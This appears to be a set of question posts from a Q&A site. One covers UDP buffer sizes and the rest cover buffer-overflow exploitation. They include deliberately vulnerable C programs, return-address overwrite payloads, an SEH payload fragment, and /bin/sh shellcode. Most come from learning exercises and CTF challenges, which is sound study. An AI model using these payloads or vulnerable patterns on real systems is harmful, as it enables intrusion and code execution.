How do I decide what buffer size to choose?

I’m learning about networking with Python and I’ve encountered something I don’t understand.

In particular:

packet = server.recvfrom(2048)

I understand that the argument passed to the .recv() and .recvfrom() methods sets the size of the buffer to work with, but I keep seeing values like 1024, 2048, … and I can't seem to connect the dots as to how to choose that size. The learning resources I'm working with don't explain this, and I would like to know.

I also understand that a buffer is a temporary data storage area allocated in RAM.
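For context, this is the kind of receive loop I'm experimenting with (a minimal sketch; the port number is arbitrary). As far as I understand, the argument is only an upper bound on how many bytes a single recvfrom() call returns, so people seem to pick a power of two at least as large as the biggest datagram they expect:

import socket

# Minimal UDP receive loop (sketch); 9999 is an arbitrary example port.
BUFFER_SIZE = 2048  # upper bound on the bytes returned by one recvfrom() call

server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server.bind(("0.0.0.0", 9999))

while True:
    # data holds at most BUFFER_SIZE bytes; for UDP, anything beyond that
    # in a single datagram is discarded (truncated).
    data, address = server.recvfrom(BUFFER_SIZE)
    print(f"received {len(data)} bytes from {address}")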

Any exploit details regarding CVE-2019-3846: Linux Kernel 'marvell/mwifiex/scan.c' Heap Buffer Overflow Vulnerability

How can I get this exploit working, or is there any method for doing so?

I have seen and read a lot about this issue in various references.

It appears that various Linux versions below 8 are vulnerable to this issue.

Linux Kernel ‘marvell/mwifiex/scan.c’ Heap Buffer Overflow Vulnerability

Issue Description: A flaw that allowed an attacker to corrupt memory and possibly escalate privileges was found in the mwifiex kernel module while connecting to a malicious wireless network.

Can you share exploit details regarding this?

https://vulners.com/cve/CVE-2019-3846
https://www.securityfocus.com/bid/69867/exploit : no exploit there

Any tips on how to exploit this?

What is this "prepare" variable used for in this SEH-based buffer overflow payload?

I am trying to understand how an SEH-based buffer overflow works, since I have to write a paper about how an exploit works. I took this PoC for my paper.

junk = "\x41" * 4091
nseh = "\x61\x62"
seh  = "\x57\x42"           # Overwrite SEH # 0x00420057 : {pivot 8}
prepare =  "\x44\x6e\x53\x6e\x58\x6e\x05"
prepare += "\x14\x11\x6e\x2d\x13\x11\x6e\x50\x6d\xc3"
prepare += "\x41" * 107
...

I don’t really understand how it’s jumping over the next SEH.

  • What is \x61\x62 used for in the nseh variable?
  • What is the prepare variable used for?
  • How is it jumping to the shellcode?

I already understand that \x57\x42 is used as a pointer targeting a pop pop ret in order to trigger a second error, but I am stuck after that…
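For comparison, here is my understanding of the classic (non-Unicode) SEH overwrite layout, as a sketch only; the offset, the pop pop ret address, and the placeholder shellcode below are made up for illustration and are not taken from this PoC:

# Classic SEH overwrite layout (sketch, made-up values)
junk      = "\x41" * 500                # filler up to the SEH record (offset is target-specific)
nseh      = "\xeb\x06\x90\x90"          # nSEH: short jmp +6, hops over the overwritten handler address
seh       = "\x40\x30\x20\x10"          # 0x10203040, hypothetical pop pop ret address (little-endian)
shellcode = "\x90" * 16 + "\xcc" * 4    # placeholder: NOP pad plus INT3s instead of real shellcode
payload   = junk + nseh + seh + shellcode

# Flow: exception -> handler (pop pop ret) runs -> ret lands on nSEH ->
# short jmp skips the 4-byte handler address -> execution reaches the shellcode.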

Understanding why this buffer overflow attack isn’t working

I'm doing a buffer overflow challenge, and I can't understand what exactly I'm doing wrong. Through debugging, I managed to figure out what my input should look like so that I can force the program to return to a particular function. From gdb I figured out that if I enter "aaaaaaaaaaaaaaaaaaaaaaaaaaaacdefbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb" I can get the program to return to cdef, i.e. 0x66656463 (screenshot omitted). As you can see, the program managed to go to 0x66656463. Now I found the function's address through gdb, and I tried placing it in cdef's spot in little-endian order using pwntools:

payload = "a" * 28 + "\x56\x85\x04\x08" + "b" * 47
msg = "-1\n" + payload
io.sendline(msg)

The reason for the "-1\n" is that the program asks for input twice: the first time I just enter -1, and for the second input I try the exploit. So far I'm just getting a segfault, even though the address I want to jump to should start a shell for me. I'm not sure what exactly I'm doing wrong, and any help would be appreciated. If I had to guess, it's that I'm somehow dealing with the two inputs incorrectly (they're being read via fgets() in C, if that matters).
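For reference, this is roughly how I'm driving the process with pwntools, rewritten with explicit bytes and p32() (a sketch; "./vuln" is a placeholder for the actual binary name, and 0x08048556 is the address already used in the payload above):

from pwn import *

io = process("./vuln")                 # placeholder binary name

target  = 0x08048556                   # the function address from the payload above
payload = b"a" * 28 + p32(target) + b"b" * 47

io.sendline(b"-1")                     # first prompt: just send -1
io.sendline(payload)                   # second prompt: send the overflow
io.interactive()                       # if the jump works, this should give the shell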

EDIT: I have the source binary and I tried running it locally. I created the following txt file

-1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaV\x85\x04\x08bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb 

and I redirect it in gdb via

run < <(cat input.txt) 

This works the same, but whenever I put an escaped hex value in place of the cdef, I get a different segfault at a different address (screenshot omitted).

It looks like if I replace any of the cdef with an escaped hex byte, I get a segfault at 0x08048726. Is something wrong with how I'm passing in the bytes?
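In case it matters, my understanding is that typing \x85 literally into a text editor stores four ASCII characters ('\', 'x', '8', '5') rather than one byte, so the file would have to be generated programmatically instead; a sketch of that, using the same address as above:

import struct

target = 0x08048556                    # function address from the payload above

# Write both inputs as raw bytes so "\x85" etc. become real bytes, not literal text.
with open("input.txt", "wb") as f:
    f.write(b"-1\n")
    f.write(b"a" * 28 + struct.pack("<I", target) + b"b" * 47 + b"\n")

# then:  (gdb) run < input.txt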

Buffer Overflow Works Locally But Not Remotely

So I made a simple buffer overflow challenge and attempted to host it on a DigitalOcean droplet. The challenge source is below, and it is compiled with gcc welcome.c -fno-stack-protector -no-pie -o welcome.

#include <unistd.h>
#include <stdio.h>

int main(void) {
    setvbuf(stdout, NULL, _IONBF, 0);
    char name[25];
    printf("whats your name? ");
    gets(name);
    printf("welcome to pwn, %s!\n", name);
    return 0;
}

void flag() {
    char flag[50];
    FILE* stream = fopen("flag.txt", "r");
    fgets(flag, 50, stream);
    printf("%s", flag);
}

Locally, inside the Docker container the challenge runs in, I am able to use the exploit seen here. Trying to use it over the netcat connection, though, it doesn't work! All of the files I am using to host the challenge can be found here. Any help or other tips would be appreciated; I have spent a large part of the day confused about this.

Bonus question: why does the binary hang after completion on the remote server until the user hits Enter? Maybe my setvbuf call is incorrect? If someone could explain this, that would be great! I am fairly new to this stuff.
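For reference, here is roughly the exploit I'm running, switchable between the local process and the remote service (a sketch: the host, port, and padding size are placeholders for my actual setup, and the address of flag() is read from the binary with pwntools):

from pwn import *

elf = ELF("./welcome")
LOCAL = False                          # flip to True to test against the local binary

if LOCAL:
    io = process("./welcome")
else:
    io = remote("203.0.113.10", 31337) # placeholder host/port, not the real droplet

padding = b"A" * 40                    # placeholder offset; the exact value comes from a debugger
payload = padding + p64(elf.symbols["flag"])

io.sendlineafter(b"whats your name? ", payload)
print(io.recvall(timeout=2))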

Cannot execute shellcode using buffer overflow

As a home exercise I'm trying to carry out a buffer overflow attack: I run a simple program that copies its input argument into a char array on the stack, then overflow that buffer with a long enough input so that EIP gets overwritten with the address of one of the NOP instructions, and execution slides down the NOP sled into the shellcode.

I'm currently running Ubuntu 16.04 32-bit in VirtualBox, with kernel ASLR disabled.

My C code:

#include <stdio.h>
#include <string.h>

int main(int argc, char **argv) {
  char buffer[500];
  strcpy(buffer, argv[1]);
  printf("%s\n", buffer);
  return 0;
}

I compiled the code with options: -z execstack -fno-stack-protector

When I execute the program in gdb, using some bash to generate the input, I manage to change the register value to an address inside the NOPs, but the program just throws a segmentation fault and I am unable to execute the shellcode.

I started with a 504-byte input: 476 NOPs + 24 bytes of shellcode + 4 x 0x45 bytes.


I was able to find my input in memory and took an address somewhere in the middle of the NOPs (0xbfffed60).

To overwrite the saved return address, I grew the total input to 508 bytes, consisting of 476 NOPs + 24 bytes of shellcode + 2 copies of the memory address (0xbfffed60, with the bytes in reversed, little-endian order: \x60\xed\xff\xbf).

When I run the code with that input, I just get a segmentation fault and the shellcode does not execute.


It seems to jump to the exact spot I'm telling it to go to, but it does not execute the NOPs or the shellcode.
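For reference, this is a sketch of how I build the input described above as a standalone Python 3 script (the real shellcode is replaced by a placeholder, and 0xbfffed60 is the address from my gdb session); I then run it in gdb with run "$(python3 exploit.py)":

import struct
import sys

NOPS      = b"\x90" * 476                   # NOP sled
SHELLCODE = b"\xcc" * 24                    # placeholder: 24 INT3 bytes instead of the real shellcode
RET       = struct.pack("<I", 0xbfffed60)   # address inside the sled, little-endian

# 476 + 24 + 2*4 = 508 bytes, matching the layout described above
sys.stdout.buffer.write(NOPS + SHELLCODE + RET * 2)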

Why do we need security measures like control flow integrity and buffer overflow guards if we have a good access control protocol in place?

Reading into information security, I noticed two branches: access control when communicating with an external device, using some type of cryptographic authentication and encryption mechanism, and things like control flow integrity. My question is why we need the latter if the former is good enough. Are there examples of control-flow exploits against access control protocol implementations themselves? My focus is mainly on embedded devices.

64-bit buffer overflow fails with SIGILL, cannot understand the reason

I have been doing 32-bit buffer overflows for some time and I decided to try some 64-bit overflows, to explore some more realistic scenarios. I have compiled my code with gcc -fno-stack-protector -z execstack -no-pie overflow.c -o Overflow.

Here is the code:

#include <stdio.h>
#include <string.h>

void function(char *str) {
    char buffer[32];
    strcpy(buffer, str);
    puts(buffer);
}

int main(int argc, char **argv) {
    function(argv[1]);
}

Using gdb I determined how many bytes I need to write before I control the return address: 40 bytes. So at first I wrote 40 bytes of "A" followed by 6 bytes of "B" to test control of the return address.

Here is a screenshot (omitted).
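(As a sanity check, I also tried confirming the 40-byte offset with pwntools' cyclic pattern instead of counting by hand; a sketch, assuming core dumps are enabled with ulimit -c unlimited:)

from pwn import *

# Crash the binary with a cyclic pattern passed as argv[1]
io = process(["./Overflow", cyclic(100)])
io.wait()

core = io.corefile                            # parse the resulting core dump
pattern = core.read(core.rsp, 4)              # bytes sitting at the saved-return-address slot
print("offset:", cyclic_find(pattern))        # expected to print 40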

I found and tested a 23-byte shellcode that executes "/bin/sh", so I write a NOP sled of 13 bytes, then the shellcode, and then the 6 bytes of the return address that need to change. So I come up with this (in gdb):

r $(python -c 'print "\x90"*13+"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"+"\x10\xe1\xff\xff\xff\x7f"')
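The same payload written as a standalone Python 3 script, the way I picture the layout (a sketch; the shellcode bytes and the stack address 0x7fffffffe110 are copied from the command above):

import struct
import sys

NOPS      = b"\x90" * 13
SHELLCODE = (b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff"
             b"\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05")
# the sled plus the shellcode fill the 40 bytes up to the saved return address
RET       = struct.pack("<Q", 0x7fffffffe110)[:6]   # low 6 bytes; the top two are already zero on the stack

sys.stdout.buffer.write(NOPS + SHELLCODE + RET)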

I set two breakpoints, before and after the execution of strcpy, and examined the memory.

This is the stack before the strcpy (screenshot omitted).

Address 0x00007fffffffe138 holds the return address of function() (screenshot omitted).

And this is the stack right after the strcpy execution (screenshot omitted).

So, in my understanding, after I press c to continue the execution, the program should "return" into the NOP sled and then execute the shellcode in gdb.

Instead I get a SIGILL, for illegal instruction.


I cannot figure out why this is happening; any help, suggestions, or pointers would be much appreciated.